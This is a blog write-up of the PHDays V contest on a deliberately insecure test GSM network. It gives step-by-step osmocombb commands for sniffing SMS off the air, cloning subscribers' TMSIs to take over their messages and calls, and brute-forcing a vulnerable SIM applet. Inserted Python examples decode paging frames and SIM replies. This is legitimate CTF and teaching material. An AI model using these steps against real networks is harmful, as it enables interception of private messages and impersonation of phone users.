Friday, July 3, 2015

The MiTM Mobile Contest: GSM Network Down at PHDays V

Although we have published several research works on cell phone tapping, SMS interception, subscriber tracking, and SIM card cracking, many of our readers still regard those stories as a kind of magic available only to intelligence agencies. The MiTM Mobile contest was held at PHDays for the first time, and it let the participants see how easily an attacker can carry out the above-mentioned attacks with nothing but a $10 cell phone and some freely available hacking software.

Contest conditions and technologies
You've got a corporate cell phone of a MiTM Mobile network user.
Through the DarkNet you have obtained some information that can be useful:
1) The codes for publes (the PHDays game currency, Pseudo rUBLE) are regularly sent to the phone number of the corporation's chief accountant: 10000.
2) The financial director is missing; nobody has been able to reach him for several days and his cell phone is turned off, but he is still receiving passwords.
3) You can obtain key information by calling the number 2000, but callers are authorized by their phone number. We also managed to find out the phone number of the director's private secretary: 77777. He must have access.
There are other numbers in the network through which some employees get important information, but unfortunately we failed to find them. Besides, don't forget: you can always come across someone's private information in the corporate network.
The CTF participants got about the same intro at the MiTM Mobile contest held at PHDays V.

We deployed a real mobile operator infrastructure for the contest. It included a base station, cell phones, landline phones, and SIM cards. The name of the contest — MiTM Mobile — was picked for a reason: we wanted to emphasize the vulnerability of our network. For the logo, we chose the Kraken (well, kind of) destroying a cell tower.

So much for the operator's trappings; now let's look at the network implementation. Our hardware was a device with the simple name UmTRX (see the manufacturer's site). The network's wireless part was based on this unit, while the base station and GSM functionality (the software part) were implemented with the Osmocom/OpenBTS stack.

UmTRX is the heart of MiTM Mobile.

We also ordered SIM cards for simple and quick network registration. They were provisioned with the MiTM Mobile network credentials, and the card data were registered in the network. To simplify air tapping and make the players' life easier, we disabled encryption in our network (A5/0). Apart from the SIM cards, the participants were provided with Motorola C118 cell phones and USB-UART cables (CP2102). All this, together with the osmocombb stack, allowed the participants to tap the air, intercept SMS messages intended for other users, and make phone calls in the network on behalf of another user.

Each team got a SIM card, cable, cell phone, and virtual machine image with the osmocombb stack build to experiment with.

Review of Tasks

Some theory at first:

  • IMSI: International Mobile Subscriber Identity, stored in the SIM card.
  • MSISDN: Mobile Subscriber ISDN Number, the phone number assigned to an IMSI in the operator's infrastructure.
  • TMSI: Temporary Mobile Subscriber Identity, randomly assigned by the network to every mobile in the area the moment it is switched on.

The IMSI is the magic number stored in the SIM card. It looks something like this: 250-01-XXXXXXXXXX, where 250 is the country code (Russia), 01 is the operator code (MTS), and XXXXXXXXXX is a unique subscriber ID. The operator's network identifies and authorizes a subscriber by the IMSI.

In this case, we have a sysmocom SIM card with country code 901, operator code 70, and subscriber ID 0000005625 in the operator's network (see fig.).

The second thing to remember: the MSISDN, your cell phone number (for example, +79171234567), is stored in the operator's database, not on the SIM card. During a call, the base station inserts this number using the IMSI <--> MSISDN conversion table (in a real network the MSC/VLR does this), or doesn't insert it at all in the case of an anonymous call.

TMSI is a 4-byte temporary identifier given to the subscriber after the authorization.

Now that we know this, let's continue.

We need to run the osmocombb stack. The steps are quite simple. Connect the cable to the computer and forward it into the virtual machine; a device named /dev/ttyUSB0 should appear there. After that, connect a TURNED-OFF cell phone to the cable through its audio jack.

Then you open two consoles. In the first one, you must run the following command:

#~/osmocom-bb-master/src/host/osmocon/osmocon  -p /dev/ttyUSB0  -m c123xor  -c ~/osmocom-bb-master/src/target/firmware/board/compal_e88/layer1.highram.bin

Now press the red button on the cell phone to turn it on. This command uploads the firmware into the phone and opens the socket that mediates between the phone and the other programs. This is the so-called layer 1 of the OSI model: it handles the physical interaction with the network.

This is roughly what layer1 outputs to the console after it has been uploaded into the phone (this is not something of interest, though).

In the second console, you must run the following command:

#~/osmocom-bb-sylvain/src/host/layer23/src/misc/ccch_scan  -a 774  -i

This command implements layers 2-3 of the OSI model, namely tapping the air in search of CCCH (Common Control Channel) packets.

774 is the ARFCN we broadcast on. Yes, nobody needs to search for our operator's channel. We did everything we could to make your life easier, dear participants :)

-i is the interface the captured packets will be sent to.

Now launch Wireshark. It will do everything for you: for instance, it will reassemble the SMS from the captured packets, parse the TPDU/PDU format, and display everything in readable form.

Remember, the first task was to intercept an SMS. To make browsing in Wireshark more convenient and keep the screen "clean", set the display filter to gsm_sms.

Now you can see the SMS messages on the air. Congrats, you've completed the first task! If you were at PHDays V right now, you would see the SMS message containing the code for getting publes. The code was aired constantly during the two days, every five minutes, even at night.

You must run layer1 again for the second task (or you can just keep it on after the previous one).

In the second console, you run the following command as layer2-3:

#~/osmocom-bb-master/src/host/layer23/src/mobile/mobile -i

Nothing really hard here. The mobile application can function as a virtual cell phone. In order to get access to these functions, you must open the third console and run

$ telnet 4247

A Cisco-like interface will open. You must enable the extended mode:

OsmocomBB> enable

After that, you should display the list of commands available:

OsmocomBB# list

What do you think the clone command does? Well, its name speaks for itself: you can clone a subscriber. The command description shows that it accepts a TMSI as an argument. If you manage to find out the victim's TMSI and put it into your phone, you will be able to connect to the network in place of the original subscriber.

During the whole conference, we kept sending an SMS message to a phone number that was absent from the network. If a participant passed the TMSI that the base station was paging as the parameter of the clone command, he or she would receive the flag with the code for money.

OsmocomBB# clone 1 5cce0f7f

It was quite easy to spot the base station's request to the subscriber: look for gsmtap packets in Wireshark containing a Paging Request Type 1 (the request the base station sends when a call or message is being delivered to a subscriber).

Alternatively, you could use the second console that has mobile launched:

After you type the TMSI, you will get an SMS message intended for the initial subscriber.
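The paging request the text tells you to look for, decoded outside Wireshark as an added example (not code from the post or from osmocombb): the script constructs a GSMTAP frame carrying a Paging Request Type 1 and decodes the Mobile Identity from it, which is exactly what any passive listener on the paging channel sees, and is why an identifier broadcast in clear can never serve the network as proof of who answers the page. The sample frame and its ARFCN, signal and frame-number values are constructed; only the TMSI and the test-SIM IMSI are taken from the post.

```python
# Added example (not from the post or from osmocombb): build and decode a
# GSMTAP v2 frame carrying a Paging Request Type 1 on the PCH, the packet the
# post tells you to look for in Wireshark. Layout follows GSMTAP v2, 3GPP
# TS 44.018 9.1.22 and the Mobile Identity IE of TS 24.008 10.5.1.4. The
# sample frame is constructed; ARFCN 774 and TMSI 5cce0f7f come from the post.
import struct

GSMTAP_VERSION, GSMTAP_TYPE_UM, GSMTAP_CHANNEL_PCH = 2, 1, 5
RR_PD, RR_PAGING_REQUEST_TYPE_1 = 0x06, 0x21
MI_TYPE_IMSI, MI_TYPE_TMSI = 1, 4
MI2_TAG = 0x17                        # optional second Mobile Identity (TLV)


def encode_mobile_identity(kind, value):
    """Encode a TMSI (8 hex chars) or an IMSI (digit string) as a Mobile Identity."""
    if kind == "TMSI":
        return bytes([0xF0 | MI_TYPE_TMSI]) + bytes.fromhex(value)
    digits = [int(d) for d in value]
    odd = len(digits) % 2             # odd/even indicator bit
    out = [(digits[0] << 4) | (odd << 3) | MI_TYPE_IMSI]
    rest = digits[1:] + ([] if odd else [0xF])      # even count: filler nibble F
    for lo, hi in zip(rest[0::2], rest[1::2]):
        out.append((hi << 4) | lo)
    return bytes(out)


def decode_mobile_identity(mi):
    """Return (kind, value) for a Mobile Identity value; other types as raw hex."""
    mi_type = mi[0] & 0x07
    if mi_type == MI_TYPE_TMSI:
        return "TMSI", mi[1:5].hex()
    if mi_type == MI_TYPE_IMSI:
        digits = [str(mi[0] >> 4)]
        for b in mi[1:]:
            digits += [str(b & 0x0F), str(b >> 4)]
        if not (mi[0] >> 3) & 1:      # even digit count: drop the filler nibble
            digits.pop()
        return "IMSI", "".join(digits)
    return "OTHER", mi.hex()


def build_paging_frame(identities, arfcn=774, frame_number=1234):
    """GSMTAP header plus a 23-octet CCCH block holding a Paging Request Type 1."""
    header = struct.pack("!BBBBHbbIBBBB", GSMTAP_VERSION, 4, GSMTAP_TYPE_UM, 0,
                         arfcn, -70, 10, frame_number, GSMTAP_CHANNEL_PCH, 0, 0, 0)
    mi1 = encode_mobile_identity(*identities[0])
    msg = bytes([RR_PD, RR_PAGING_REQUEST_TYPE_1, 0x00, len(mi1)]) + mi1
    for kind, value in identities[1:2]:            # this message carries at most two
        mi2 = encode_mobile_identity(kind, value)
        msg += bytes([MI2_TAG, len(mi2)]) + mi2
    block = bytes([(len(msg) << 2) | 0x01]) + msg   # L2 pseudo length octet first
    return header + block + b"\x2b" * (23 - len(block))   # rest-octet padding


def decode_paging_request(frame):
    """Identities paged in a GSMTAP frame; [] if it is not a Paging Request Type 1."""
    if len(frame) < 16 or frame[0] != GSMTAP_VERSION:
        raise ValueError("not a GSMTAP v2 frame")
    if frame[2] != GSMTAP_TYPE_UM or frame[12] != GSMTAP_CHANNEL_PCH:
        return []
    block = frame[frame[1] * 4:]                   # header length is in 32-bit words
    msg = block[1:1 + (block[0] >> 2)]
    if len(msg) < 4 or (msg[0] & 0x0F) != RR_PD or msg[1] != RR_PAGING_REQUEST_TYPE_1:
        return []
    mi1_len = msg[3]
    found = [decode_mobile_identity(msg[4:4 + mi1_len])]
    pos = 4 + mi1_len
    if pos + 1 < len(msg) and msg[pos] == MI2_TAG:
        found.append(decode_mobile_identity(msg[pos + 2:pos + 2 + msg[pos + 1]]))
    return found


# Constructed sample: the network paging TMSI 5cce0f7f and, as MI2, the IMSI of
# the sysmocom test SIM described in the post (901 70 0000005625)
SAMPLE_FRAME = build_paging_frame([("TMSI", "5cce0f7f"), ("IMSI", "901700000005625")])
```

Feeding `SAMPLE_FRAME` to `decode_paging_request` returns the TMSI and IMSI being paged; a frame on any other GSMTAP sub-channel, or one carrying a different RR message, returns an empty list.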

Now you have enough information for the third task. Here, as in the previous task, you have to pretend to be another subscriber. You know his number but not his TMSI. What can you do? It's easy: send an SMS message or place a call to the number 77777, and you will see the base station's requests to subscriber 77777, just as in the last example. Note: you must use another cell phone for the call or SMS; otherwise your Motorola won't see the base station's broadcast requests intended for the target subscriber.

After that, put the TMSI into your phone with the clone command and make a call to the precious number!

OsmocomBB# call 1 2000

Now take the Motorola and listen for the code. Participants who did everything right heard it; otherwise a joke was all they got :)

Additionally, there were SMS messages in the network notifying of a new voice message. If the participants hadn't been lazy and had opened the device's phone book, they would have found the voice mail number. Calling it, you could hear insider information: data about the rise and fall of MiTM Mobile's share price.

The fourth task was related not so much to GSM as to the vulnerable SIM cards used to access the network. Apart from the phone, each team got a SIM card with a pre-installed application showing a greeting: "Welcome to PHDays V". Lukas Kuzmiak and Karsten Nohl created a utility called SIMTester for finding vulnerable applets. Its key feature is the ability to work through osmocom cell phones. So you plug the SIM card into the phone, connect it to your computer and start the search. After a couple of minutes, you can analyze the data obtained:

Apart from many applets that disclose enough information for brute-forcing their keys, you are given a "red" application that demands no secret key at all to access. Let's analyse it separately:

The last two bytes of the SIM card's reply are the status bytes, where, for instance, 0x9000 means that the command completed successfully. In this case you get 0x9124, which means the card has 36 bytes it wants to return to us. Let's change the program code a little to fetch them and see what kind of data it is.

After decoding, you will get:

>>> 'D0228103012100820281028D1704596F752061726520636C6F73652C2062616420434C419000'.decode('hex')
'\xd0"\x81\x03\x01!\x00\x82\x02\x81\x02\x8d\x17\x04You are close, bad CLA\x90\x00'

You need to brute force all possible CLA and INS values for the instructions sent in the binary SMS message, and you will get the flag:

>>> 'D0378103012100820281028D2C04596F757220666C61673A2035306634323865623762623163313234323231383333366435306133376239659000'.decode('hex')
'\xd07\x81\x03\x01!\x00\x82\x02\x81\x02\x8d,\x04Your flag: 50f428eb7bb1c1242218336d50a37b9e\x90\x00'
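Decoding those replies by eye is error-prone, so here is an added example (not from the post or from SIMTester) that parses them as the SIM Toolkit proactive commands they are: it splits off the status word, walks the simple TLVs and returns the command type, the device identities and the displayed text. The two hex strings are the replies shown above; the command and device name tables follow ETSI TS 102 223.

```python
# Added example (not from the post or from SIMTester): parse the raw replies
# the "red" applet returns. After a 91 xx status word the FETCH command returns
# a proactive command (ETSI TS 102 223): tag D0, a length, then simple TLVs for
# command details, device identities and the text string, followed by SW1 SW2.
# The two hex strings are the replies shown in the post.
import binascii

CLOSE_REPLY = ("D0228103012100820281028D1704"
               "596F752061726520636C6F73652C2062616420434C41"
               "9000")
FLAG_REPLY = ("D0378103012100820281028D2C04"
              "596F757220666C61673A20"
              "3530663432386562376262316331323432323138333336643530613337623965"
              "9000")

TAG_COMMAND_DETAILS, TAG_DEVICE_IDENTITIES, TAG_TEXT_STRING = 0x01, 0x02, 0x0D
COMMAND_TYPES = {0x21: "DISPLAY TEXT", 0x13: "SEND SHORT MESSAGE", 0x10: "SET UP CALL"}
DEVICES = {0x02: "display", 0x81: "UICC", 0x82: "terminal", 0x83: "network"}
SW1_ERRORS = {0x6E: "class (CLA) not supported", 0x6D: "instruction (INS) not supported"}


def describe_status(sw1, sw2):
    """Interpret the SW1 SW2 status bytes that end every card reply."""
    if (sw1, sw2) == (0x90, 0x00):
        return "OK"
    if sw1 == 0x91:                  # proactive command waiting: FETCH sw2 bytes
        return "OK, %d bytes of proactive command pending" % sw2
    return SW1_ERRORS.get(sw1, "unexpected status %02X%02X" % (sw1, sw2))


def parse_simple_tlvs(data):
    """Split the body of a proactive command into {tag: value}."""
    items, i = {}, 0
    while i < len(data):
        tag = data[i] & 0x7F         # strip the comprehension-required bit
        length, i = data[i + 1], i + 2
        if length == 0x81:           # two-octet length form for 128..255
            length, i = data[i], i + 1
        value = data[i:i + length]
        if len(value) != length:
            raise ValueError("truncated TLV for tag %02X" % tag)
        items[tag], i = value, i + length
    return items


def decode_text_string(value):
    """Text string TLV: one data-coding-scheme octet, then the text itself."""
    dcs, text = value[0], value[1:]
    if dcs == 0x04:                  # 8-bit data, as in both replies above
        return text.decode("latin-1")
    if dcs == 0x08:                  # UCS2
        return text.decode("utf-16-be")
    raise ValueError("DCS %02X not handled (packed 7-bit text)" % dcs)


def parse_proactive_reply(hex_reply):
    """Describe a FETCHed proactive command and the status word after it."""
    raw = binascii.unhexlify(hex_reply)
    data, sw1, sw2 = raw[:-2], raw[-2], raw[-1]
    if not data or data[0] != 0xD0:
        raise ValueError("not a proactive command (tag D0 expected)")
    length, start = data[1], 2
    if length == 0x81:               # length form for bodies of 128..255 octets
        length, start = data[2], 3
    tlvs = parse_simple_tlvs(data[start:start + length])
    _number, cmd_type, _qualifier = tlvs[TAG_COMMAND_DETAILS]
    src, dst = tlvs[TAG_DEVICE_IDENTITIES]
    text = tlvs.get(TAG_TEXT_STRING)
    return {
        "command": COMMAND_TYPES.get(cmd_type, "type %02X" % cmd_type),
        "from": DEVICES.get(src, "%02X" % src),
        "to": DEVICES.get(dst, "%02X" % dst),
        "text": decode_text_string(text) if text else None,
        "status": describe_status(sw1, sw2),
    }
```

Both replies parse as a DISPLAY TEXT command from the UICC to the display; `describe_status(0x91, 0x24)` explains the 0x9124 seen in the first SIMTester run.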

That's it, as far as the tasks are concerned.

Contest winners and surprises

All PHDays attendees could try their hand at the MiTM Mobile contest alongside the CTF teams: anyone who wished to take part was provided with all the necessary equipment and a virtual machine. Overall, there were more than ten participants on top of the CTF teams.

However, by the middle of the first day only one person had managed to intercept the SMS message: Gleb Cherbov, who ultimately became the contest winner.

Only the More Smoked Leet Chicken team had completed three tasks by the beginning of the second day. The fourth task was available only to the CTF participants, but nobody solved it.

Forum visitors may have noticed that LTE and 3G occasionally disappeared, and sometimes the network was unavailable near the zone with the GSM jammers, which looked like this:

Some people received messages from the number 74957440144 (or from an anonymous sender) with the text "SMS_from_bank" or some other "harmless spam". This was connected with the operation of the MiTM Mobile network.

Also, some "luckers" got the following message by the end of the second day:

This joke has nothing to do with the functioning of MiTM Mobile, but it is one more reminder of basic safety rules. Watch out for your beloved phone: it suddenly discovers the MosMetro_Free network (the free Wi-Fi in the Moscow metro) in a place where it shouldn't exist, connects to it, and lots of apps walk straight into the trap. Some of them use the phone number as an identifier; the attacker collects these numbers and then sends messages through an SMS gateway to all the "luckers".

P.S. Here are the details about the network components for anyone who would like to run a contest similar to our MiTM Mobile.

The UmTRX itself is an SDR (Software Defined Radio), i.e. "just a radio". All the configuration manuals are available from the manufacturer. You may also use a ready-made solution from the UmTRX makers, UmDESK, which has everything pre-installed. All you need is to fill in the configuration files according to the manual and start broadcasting.

You can find an image of the osmocombb stack here (we highly recommend VMware 11). This build is enough for experimenting. SIM cards are not necessary, but you do need a cell phone and any USB-UART cable.

You could choose any cell phone from the list:

And yes, you can find PL2303 and FT232 cables almost everywhere. Unsoldering a 2.5 mm mini-jack is a piece of cake.

You can order SIM cards and the cable online, for example:
USB-UART (CP2102):
SIM cards:

You can find cell phones on eBay, buy them in pedestrian underpasses, or order them from China: on average, you will spend $10 per phone.

We want to express special gratitude to the guys from Fairwaves (the ones who make UmTRX, UmDESK, UmROCKET, etc.) for consulting and the equipment provided for testing. They do a GREAT thing! And special thanks to Ivan.


  10. If you are good at hacking you can easily hack any mobile phone, but we cannot easily use SIM card cracking. In our country there are many legal procedures…

  12. I wonder what is the oldest gadget in this pile?
